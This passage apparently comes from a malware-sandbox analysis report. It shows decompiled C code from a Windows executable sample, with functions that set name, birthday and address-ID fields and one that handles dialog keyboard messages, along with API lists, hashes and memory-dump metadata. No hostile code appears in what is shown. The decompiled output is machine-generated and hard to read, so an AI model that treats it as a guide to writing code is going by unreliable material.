				_t155 =  *((intOrPtr*)(_t235 - 0x1c));
				 *(_t235 - 4) = 0xe;
				if(_t155 != 0) {
					 *((intOrPtr*)( *_t155 + 8))(_t155);
				}
				_t156 =  *((intOrPtr*)(_t235 - 0x20));
				 *(_t235 - 4) = 0xd;
				if(_t156 != 0) {
					 *((intOrPtr*)( *_t156 + 8))(_t156);
				}
				_push(_t235 - 0x60);
				 *(_t235 - 4) = 0xc;
				if( *_t182() < 0) {
					E0041FC30(_t158);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x40);
				if( *_t182() < 0) {
					E0041FC30(_t160);
				}
				_t163 = E00406479(E0040669E(0x458420), 0x458040, 0x458040);
				 *[fs:0x0] =  *((intOrPtr*)(_t235 - 0xc));
				return _t163;
			}

























                                                                              0x00406a50
                                                                              0x00406a5b
                                                                              0x00406a5d
                                                                              0x00406a5f
                                                                              0x00406a79
                                                                              0x00406a83
                                                                              0x00406a8e
                                                                              0x00406a97
                                                                              0x00406a9e
                                                                              0x00406aab
                                                                              0x00406ab6
                                                                              0x00406ac5
                                                                              0x00406ad0
                                                                              0x00406ad8
                                                                              0x00406ae1
                                                                              0x00406ae3
                                                                              0x00406ae8
                                                                              0x00406aed
                                                                              0x00406af1
                                                                              0x00406af3
                                                                              0x00406af6
                                                                              0x00406af6
                                                                              0x00406af9
                                                                              0x00406afe
                                                                              0x00406b02
                                                                              0x00406b04
                                                                              0x00406b07
                                                                              0x00406b07
                                                                              0x00406b0a
                                                                              0x00406b13
                                                                              0x00406b14
                                                                              0x00406b1c
                                                                              0x00406b1f
                                                                              0x00406b1f
                                                                              0x00406b24
                                                                              0x00406b2b
                                                                              0x00406b30
                                                                              0x00406b33
                                                                              0x00406b33
                                                                              0x00406b3d
                                                                              0x00406b48
                                                                              0x00406b54
                                                                              0x00406b60
                                                                              0x00406b69
                                                                              0x00406b74
                                                                              0x00406b83
                                                                              0x00406b8e
                                                                              0x00406b98
                                                                              0x00406ba1
                                                                              0x00406ba3
                                                                              0x00406ba8
                                                                              0x00406bad
                                                                              0x00406bb1
                                                                              0x00406bb3
                                                                              0x00406bb6
                                                                              0x00406bb6
                                                                              0x00406bb9
                                                                              0x00406bbe
                                                                              0x00406bc2
                                                                              0x00406bc4
                                                                              0x00406bc7
                                                                              0x00406bc7
                                                                              0x00406bcd
                                                                              0x00406bce
                                                                              0x00406bd6
                                                                              0x00406bd9
                                                                              0x00406bd9
                                                                              0x00406bde
                                                                              0x00406be5
                                                                              0x00406bea
                                                                              0x00406bed
                                                                              0x00406bed
                                                                              0x00406bf7
                                                                              0x00406c02
                                                                              0x00406c0e
                                                                              0x00406c1a
                                                                              0x00406c23
                                                                              0x00406c2e
                                                                              0x00406c3d
                                                                              0x00406c48
                                                                              0x00406c52
                                                                              0x00406c5b
                                                                              0x00406c5d
                                                                              0x00406c62
                                                                              0x00406c67
                                                                              0x00406c6b
                                                                              0x00406c6d
                                                                              0x00406c70
                                                                              0x00406c70
                                                                              0x00406c73
                                                                              0x00406c78
                                                                              0x00406c7c
                                                                              0x00406c7e
                                                                              0x00406c81
                                                                              0x00406c81
                                                                              0x00406c87
                                                                              0x00406c88
                                                                              0x00406c90
                                                                              0x00406c93
                                                                              0x00406c93
                                                                              0x00406c98
                                                                              0x00406c9f
                                                                              0x00406ca4
                                                                              0x00406ca7
                                                                              0x00406ca7
                                                                              0x00406cb1
                                                                              0x00406cbc
                                                                              0x00406cc8
                                                                              0x00406ccf
                                                                              0x00406cdc
                                                                              0x00406ce7
                                                                              0x00406cf6
                                                                              0x00406d01
                                                                              0x00406d09
                                                                              0x00406d14
                                                                              0x00406d19
                                                                              0x00406d1e
                                                                              0x00406d22
                                                                              0x00406d27
                                                                              0x00406d27
                                                                              0x00406d2a
                                                                              0x00406d2f
                                                                              0x00406d33
                                                                              0x00406d38
                                                                              0x00406d38
                                                                              0x00406d3e
                                                                              0x00406d3f
                                                                              0x00406d47
                                                                              0x00406d4a
                                                                              0x00406d4a
                                                                              0x00406d4f
                                                                              0x00406d56
                                                                              0x00406d5b
                                                                              0x00406d5e
                                                                              0x00406d5e
                                                                              0x00406d73
                                                                              0x00406d7e
                                                                              0x00406d86

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00406A50
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(?), ref: 00406B18
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406B2C
                                                                              • VariantClear.OLEAUT32(?), ref: 00406BD2
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406BE6
                                                                              • VariantClear.OLEAUT32(?), ref: 00406C8C
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406CA0
                                                                              • VariantClear.OLEAUT32(?), ref: 00406D43
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406D57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$H_prolog$ByteCharMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 1096505026-934635829
                                                                              • Opcode ID: f138b5058df17c204c0022bf0a240c6d99a45a3229c88d5b74d157336ca80105
                                                                              • Instruction ID: e5dcb4fd0207a17bfa72141c2bedb9427cf29cf0c9c24e4773d7023e17c05364
                                                                              • Opcode Fuzzy Hash: f138b5058df17c204c0022bf0a240c6d99a45a3229c88d5b74d157336ca80105
                                                                              • Instruction Fuzzy Hash: A7A17570A00249DBDF04EBF9C955BAEB7B8AF44308F14446EA406F72C1EF7C9A158769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406D87, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 269COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E00406D87(void* __ecx) {
				void* _t99;
				void* _t102;
				void* _t104;
				intOrPtr* _t107;
				intOrPtr* _t108;
				void* _t117;
				void* _t119;
				intOrPtr* _t122;
				intOrPtr* _t123;
				void* _t132;
				void* _t134;
				intOrPtr* _t137;
				intOrPtr* _t138;
				void* _t144;
				void* _t147;
				void* _t149;
				intOrPtr* _t152;
				intOrPtr* _t153;
				void* _t160;
				intOrPtr* _t179;
				void* _t224;
				void* _t230;

				E004128A0(E00430A8E, _t230);
				_push(1);
				_t224 = __ecx;
				E00425C57(__ecx);
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(__ecx, "AdressID");
				 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
				_t99 = E004061D9(_t230 - 0x50,  *((intOrPtr*)(__ecx + 0x11c)));
				 *(_t230 - 4) = 1;
				_t102 = E00406A15(E0040669E(0x458420), _t230 - 0x14);
				 *(_t230 - 4) = 2;
				_t104 = E004069CF(E0040669E(_t102), _t230 - 0x10, _t230 - 0x30);
				 *(_t230 - 4) = 3;
				_t190 = E0040669E(_t104);
				E004062B5(_t105, _t99);
				_t107 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 2;
				if(_t107 != 0) {
					_t190 =  *_t107;
					 *((intOrPtr*)( *_t107 + 8))(_t107);
				}
				_t108 =  *((intOrPtr*)(_t230 - 0x14));
				 *(_t230 - 4) = 1;
				if(_t108 != 0) {
					_t190 =  *_t108;
					 *((intOrPtr*)( *_t108 + 8))(_t108);
				}
				_t179 = __imp__#9;
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 0;
				if( *_t179() < 0) {
					E0041FC30(_t110);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t112);
				}
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(_t190, "FirstName");
				 *(_t230 - 4) = 4;
				 *((intOrPtr*)(_t230 - 0x14)) = E004061D9(_t230 - 0x50,  *((intOrPtr*)(_t224 + 0x114)));
				 *(_t230 - 4) = 5;
				_t117 = E00406A15(E0040669E(0x458420), _t230 - 0x18);
				 *(_t230 - 4) = 6;
				_t119 = E004069CF(E0040669E(_t117), _t230 - 0x10, _t230 - 0x30);
				 *(_t230 - 4) = 7;
				_t199 = E0040669E(_t119);
				E004062B5(_t120,  *((intOrPtr*)(_t230 - 0x14)));
				_t122 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 6;
				if(_t122 != 0) {
					_t199 =  *_t122;
					 *((intOrPtr*)( *_t122 + 8))(_t122);
				}
				_t123 =  *((intOrPtr*)(_t230 - 0x18));
				 *(_t230 - 4) = 5;
				if(_t123 != 0) {
					_t199 =  *_t123;
					 *((intOrPtr*)( *_t123 + 8))(_t123);
				}
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 4;
				if( *_t179() < 0) {
					E0041FC30(_t125);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t127);
				}
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(_t199, "LastName");
				 *(_t230 - 4) = 8;
				 *((intOrPtr*)(_t230 - 0x18)) = E004061D9(_t230 - 0x50,  *((intOrPtr*)(_t224 + 0x118)));
				 *(_t230 - 4) = 9;
				_t132 = E00406A15(E0040669E(0x458420), _t230 - 0x10);
				 *(_t230 - 4) = 0xa;
				_t134 = E004069CF(E0040669E(_t132), _t230 - 0x14, _t230 - 0x30);
				 *(_t230 - 4) = 0xb;
				_t208 = E0040669E(_t134);
				E004062B5(_t135,  *((intOrPtr*)(_t230 - 0x18)));
				_t137 =  *((intOrPtr*)(_t230 - 0x14));
				 *(_t230 - 4) = 0xa;
				if(_t137 != 0) {
					_t208 =  *_t137;
					 *((intOrPtr*)( *_t137 + 8))(_t137);
				}
				_t138 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 9;
				if(_t138 != 0) {
					_t208 =  *_t138;
					 *((intOrPtr*)( *_t138 + 8))(_t138);
				}
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 8;
				if( *_t179() < 0) {
					E0041FC30(_t140);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t142);
				}
				 *((short*)(_t230 - 0x40)) = 8;
				 *((intOrPtr*)(_t230 - 0x38)) = E0041FCB0(_t208, "BirthDay");
				 *(_t230 - 4) = 0xc;
				_t144 = E004061D9(_t230 - 0x60,  *((intOrPtr*)(_t224 + 0x110)));
				 *(_t230 - 4) = 0xd;
				_t147 = E00406A15(E0040669E(0x458420), _t230 - 0x20);
				 *(_t230 - 4) = 0xe;
				_t149 = E004069CF(E0040669E(_t147), _t230 - 0x1c, _t230 - 0x40);
				 *(_t230 - 4) = 0xf;
				E004062B5(E0040669E(_t149), _t144);
				_t152 =  *((intOrPtr*)(_t230 - 0x1c));
				 *(_t230 - 4) = 0xe;
				if(_t152 != 0) {
					 *((intOrPtr*)( *_t152 + 8))(_t152);
				}
				_t153 =  *((intOrPtr*)(_t230 - 0x20));
				 *(_t230 - 4) = 0xd;
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
				}
				_push(_t230 - 0x60);
				 *(_t230 - 4) = 0xc;
				if( *_t179() < 0) {
					E0041FC30(_t155);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x40);
				if( *_t179() < 0) {
					E0041FC30(_t157);
				}
				_t160 = E00406479(E0040669E(0x458420), 0x458040, 0x458040);
				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
				return _t160;
			}

























                                                                              0x00406d8c
                                                                              0x00406d97
                                                                              0x00406d99
                                                                              0x00406d9b
                                                                              0x00406da5
                                                                              0x00406db0
                                                                              0x00406db9
                                                                              0x00406dc0
                                                                              0x00406dd2
                                                                              0x00406ddd
                                                                              0x00406dec
                                                                              0x00406df7
                                                                              0x00406dff
                                                                              0x00406e08
                                                                              0x00406e0a
                                                                              0x00406e0f
                                                                              0x00406e14
                                                                              0x00406e18
                                                                              0x00406e1a
                                                                              0x00406e1d
                                                                              0x00406e1d
                                                                              0x00406e20
                                                                              0x00406e25
                                                                              0x00406e29
                                                                              0x00406e2b
                                                                              0x00406e2e
                                                                              0x00406e2e
                                                                              0x00406e31
                                                                              0x00406e3a
                                                                              0x00406e3b
                                                                              0x00406e43
                                                                              0x00406e46
                                                                              0x00406e46
                                                                              0x00406e4b
                                                                              0x00406e52
                                                                              0x00406e57
                                                                              0x00406e5a
                                                                              0x00406e5a
                                                                              0x00406e64
                                                                              0x00406e6f
                                                                              0x00406e7b
                                                                              0x00406e87
                                                                              0x00406e90
                                                                              0x00406e9b
                                                                              0x00406eaa
                                                                              0x00406eb5
                                                                              0x00406ebf
                                                                              0x00406ec8
                                                                              0x00406eca
                                                                              0x00406ecf
                                                                              0x00406ed4
                                                                              0x00406ed8
                                                                              0x00406eda
                                                                              0x00406edd
                                                                              0x00406edd
                                                                              0x00406ee0
                                                                              0x00406ee5
                                                                              0x00406ee9
                                                                              0x00406eeb
                                                                              0x00406eee
                                                                              0x00406eee
                                                                              0x00406ef4
                                                                              0x00406ef5
                                                                              0x00406efd
                                                                              0x00406f00
                                                                              0x00406f00
                                                                              0x00406f05
                                                                              0x00406f0c
                                                                              0x00406f11
                                                                              0x00406f14
                                                                              0x00406f14
                                                                              0x00406f1e
                                                                              0x00406f29
                                                                              0x00406f35
                                                                              0x00406f41
                                                                              0x00406f4a
                                                                              0x00406f55
                                                                              0x00406f64
                                                                              0x00406f6f
                                                                              0x00406f79
                                                                              0x00406f82
                                                                              0x00406f84
                                                                              0x00406f89
                                                                              0x00406f8e
                                                                              0x00406f92
                                                                              0x00406f94
                                                                              0x00406f97
                                                                              0x00406f97
                                                                              0x00406f9a
                                                                              0x00406f9f
                                                                              0x00406fa3
                                                                              0x00406fa5
                                                                              0x00406fa8
                                                                              0x00406fa8
                                                                              0x00406fae
                                                                              0x00406faf
                                                                              0x00406fb7
                                                                              0x00406fba
                                                                              0x00406fba
                                                                              0x00406fbf
                                                                              0x00406fc6
                                                                              0x00406fcb
                                                                              0x00406fce
                                                                              0x00406fce
                                                                              0x00406fd8
                                                                              0x00406fe3
                                                                              0x00406fef
                                                                              0x00406ff6
                                                                              0x00407003
                                                                              0x0040700e
                                                                              0x0040701d
                                                                              0x00407028
                                                                              0x00407030
                                                                              0x0040703b
                                                                              0x00407040
                                                                              0x00407045
                                                                              0x00407049
                                                                              0x0040704e
                                                                              0x0040704e
                                                                              0x00407051
                                                                              0x00407056
                                                                              0x0040705a
                                                                              0x0040705f
                                                                              0x0040705f
                                                                              0x00407065
                                                                              0x00407066
                                                                              0x0040706e
                                                                              0x00407071
                                                                              0x00407071
                                                                              0x00407076
                                                                              0x0040707d
                                                                              0x00407082
                                                                              0x00407085
                                                                              0x00407085
                                                                              0x0040709a
                                                                              0x004070a5
                                                                              0x004070ad

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00406D8C
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(?), ref: 00406E3F
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406E53
                                                                              • VariantClear.OLEAUT32(?), ref: 00406EF9
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406F0D
                                                                              • VariantClear.OLEAUT32(?), ref: 00406FB3
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406FC7
                                                                              • VariantClear.OLEAUT32(?), ref: 0040706A
                                                                              • VariantClear.OLEAUT32(00000008), ref: 0040707E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$H_prolog$ByteCharMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 1096505026-934635829
                                                                              • Opcode ID: 9d33b65be6b7bab757115e18c74b9ab704943c0dda13e8b3f3a8995022b2b678
                                                                              • Instruction ID: b3793917955f3ec542d11301d8d5840c5ed7146996fc9de46d777ad14273860a
                                                                              • Opcode Fuzzy Hash: 9d33b65be6b7bab757115e18c74b9ab704943c0dda13e8b3f3a8995022b2b678
                                                                              • Instruction Fuzzy Hash: F5A18570A00209EBCF04EBF5C955BEEB7B96F44308F14446EA406F72C1EF799A158769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004110A7, Relevance: 22.9, APIs: 15, Instructions: 359windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004110A7() {
				void* __ebx;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				intOrPtr* _t173;
				void* _t174;
				signed int _t186;
				void* _t189;
				signed int _t191;
				WPARAM _t203;
				struct tagMSG* _t208;
				signed int _t209;
				signed int _t211;
				int _t213;
				signed int _t214;
				int _t217;
				signed int _t218;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t228;

				E004128A0(E0043132A, _t226);
				_t112 =  *(_t226 + 8);
				 *((intOrPtr*)(_t226 - 0x10)) = _t228 - 0x20;
				if(_t112 != 0) {
					 *(_t226 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t226 - 0x28) =  *(_t226 - 0x28) & _t112;
				}
				_t208 =  *(_t226 + 0xc);
				_t217 = _t208->message;
				 *(_t226 - 0x18) = _t217;
				 *(_t226 - 0x2c) = GetFocus();
				_t115 = E00426406(_t226, _t114);
				 *(_t226 - 0x14) = _t115;
				if(_t217 < 0x100 || _t217 > 0x109) {
					if(_t217 < 0x200 || _t217 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t226 - 0x1c)) = E00426406(_t226, _t208->hwnd);
						_t218 = 0;
						 *(_t226 - 0x24) =  *(_t226 - 0x24) & 0;
						_t118 =  *(_t226 - 0x18) - 0x100;
						__eflags = _t118;
						 *((intOrPtr*)(_t226 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E0041092D( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							_t186 = _t208->wParam & 0x0000ffff;
							__eflags = _t186 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t186 - 0x25;
								if(_t186 < 0x25) {
									L47:
									_t209 = IsDialogMessageA( *( *(_t226 + 8) + 0x1c),  *(_t226 + 0xc));
									__eflags = _t209;
									if(_t209 != 0) {
										_t132 = E00426406(_t226, GetFocus());
										__eflags = _t132 -  *(_t226 - 0x14);
										if(_t132 !=  *(_t226 - 0x14)) {
											E00410DAC(E00426406(_t226, GetFocus()));
										}
									}
									L50:
									_t122 = IsWindow( *(_t226 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E00410E19( *(_t226 - 0x14), E00426406(_t226, GetFocus()));
										_pop(_t189);
										_t127 = IsWindow( *(_t226 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E00410FC7(_t189,  *(_t226 + 8),  *(_t226 - 0x14), E00426406(_t226, GetFocus()));
										}
									}
									_t123 = _t209;
									goto L54;
								}
								__eflags = _t186 - 0x26;
								if(_t186 <= 0x26) {
									 *(_t226 - 0x24) = 1;
									L81:
									_t136 = E0041092D( *(_t226 - 0x14), _t208);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t226 - 0x24);
									_t191 =  *(_t226 + 8);
									_push(0);
									if( *(_t226 - 0x24) == 0) {
										_t137 = E004287C4(_t191);
									} else {
										_t137 = E004286C8(_t191);
									}
									_t222 = _t137;
									__eflags = _t222;
									if(_t222 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t222 + 8);
										if( *(_t222 + 8) != 0) {
											E004288C0( *(_t226 + 8), _t222);
										}
										__eflags =  *(_t222 + 4);
										if( *(_t222 + 4) == 0) {
											_t138 =  *_t222;
											__eflags = _t138;
											if(_t138 == 0) {
												_t139 = E004109DC( *(_t226 + 8),  *(_t226 - 0x14),  *(_t226 - 0x24));
											} else {
												_t139 = E00426406(_t226, _t138);
											}
											_t211 = _t139;
											__eflags = _t211;
											if(_t211 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t226 + 8) + 0x48)) + 0x6c)) = 0;
												E00410A16(_t211);
												__eflags =  *(_t222 + 8);
												if( *(_t222 + 8) != 0) {
													SendMessageA( *(_t211 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											 *((intOrPtr*)( *( *(_t222 + 4)) + 0xac))(_t208);
											L90:
											_t209 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t186 - 0x28;
								if(_t186 <= 0x28) {
									goto L81;
								}
								__eflags = _t186 - 0x2b;
								if(_t186 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E004109BB( *(_t226 - 0x14));
								__eflags = _t147 & 0x00000010;
								if((_t147 & 0x00000010) == 0) {
									_t148 = E00410F9A( *(_t226 + 8));
								} else {
									_t218 =  *(_t226 - 0x14);
									_t148 = E004283CA(_t218);
								}
								_t213 = 0;
								__eflags = _t218;
								 *((intOrPtr*)(_t226 - 0x20)) = _t148;
								if(_t218 != 0) {
									L76:
									_t149 = E00428444(_t218);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t218 + 0x4c)) - _t213;
										if( *((intOrPtr*)(_t218 + 0x4c)) == _t213) {
											goto L47;
										}
										_push(_t213);
										_push(_t213);
										_push(_t213);
										_push(1);
										_push(0xfffffdd9);
										_push(_t218);
										 *(_t226 - 4) = _t213;
										E004284A1();
										 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t213);
									goto L47;
								} else {
									L75:
									_t218 = E00410E94( *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x20)));
									__eflags = _t218 - _t213;
									if(_t218 == _t213) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t213 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t186 - 3;
							if(_t186 == 3) {
								goto L74;
							}
							__eflags = _t186 - 9;
							if(_t186 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t223 =  *(_t226 + 8);
								__eflags = _t153;
								_t185 = 0 | _t153 < 0x00000000;
								_t154 = E004285EC(_t223, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t156 = E004083B5(_t223,  *((intOrPtr*)(_t226 - 0x1c)), _t185);
									} else {
										_t156 = E00426406(_t226, _t155);
									}
									_t214 = _t156;
									__eflags = _t214;
									if(_t214 != 0) {
										 *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) & 0x00000000;
										E00410A16(_t214);
										E00410E19( *(_t226 - 0x14), _t214);
									}
								} else {
									 *((intOrPtr*)( *( *(_t154 + 4)) + 0xac))(_t208);
								}
								goto L90;
							}
							__eflags = _t186 - 0xd;
							if(_t186 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E0041092D( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								L35:
								_t203 = _t208->wParam;
								__eflags = _t203 - 9;
								if(_t203 != 9) {
									L37:
									__eflags = _t203 - 0x20;
									if(__eflags != 0) {
										_t165 = E00410CD1(0x100, _t203, __eflags,  *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x1c)), _t208);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											E0040BABF(_t166, _t208);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t226 - 0x14);
						if( *(_t226 - 0x14) != 0) {
							L32:
							__eflags = _t208->wParam - 0x20;
							if(_t208->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t224 =  *(_t226 - 0x14);
						while( *(_t224 + 0x4c) == 0 && E00426406(_t226, GetParent( *(_t224 + 0x1c))) !=  *(_t226 + 8)) {
							_t224 = E00426406(_t226, GetParent( *(_t224 + 0x1c)));
							if(_t224 != 0) {
								continue;
							}
							break;
						}
						if(_t224 == 0) {
							L17:
							__eflags =  *(_t226 - 0x18) - 0x101;
							if( *(_t226 - 0x18) == 0x101) {
								L20:
								__eflags = _t224;
								if(_t224 == 0) {
									L26:
									_t208 =  *(_t226 + 0xc);
									goto L27;
								}
								_t225 =  *(_t224 + 0x4c);
								__eflags = _t225;
								if(_t225 == 0) {
									goto L26;
								}
								_t171 =  *(_t226 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t225 + 0x80) & 0x00000002;
									if(( *(_t225 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t225 + 0x80) & 0x00000001;
								if(( *(_t225 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t226 - 0x18) - 0x100;
							if( *(_t226 - 0x18) == 0x100) {
								goto L20;
							}
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t224 + 0x4c);
						if(_t172 == 0 ||  *((intOrPtr*)(_t172 + 0x54)) == 0) {
							goto L17;
						} else {
							_t173 =  *((intOrPtr*)(_t172 + 0x54));
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t226 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

















































                                                                              0x004110ac
                                                                              0x004110b4
                                                                              0x004110bc
                                                                              0x004110bf
                                                                              0x004110c9
                                                                              0x004110c1
                                                                              0x004110c1
                                                                              0x004110c1
                                                                              0x004110cc
                                                                              0x004110cf
                                                                              0x004110d2
                                                                              0x004110dc
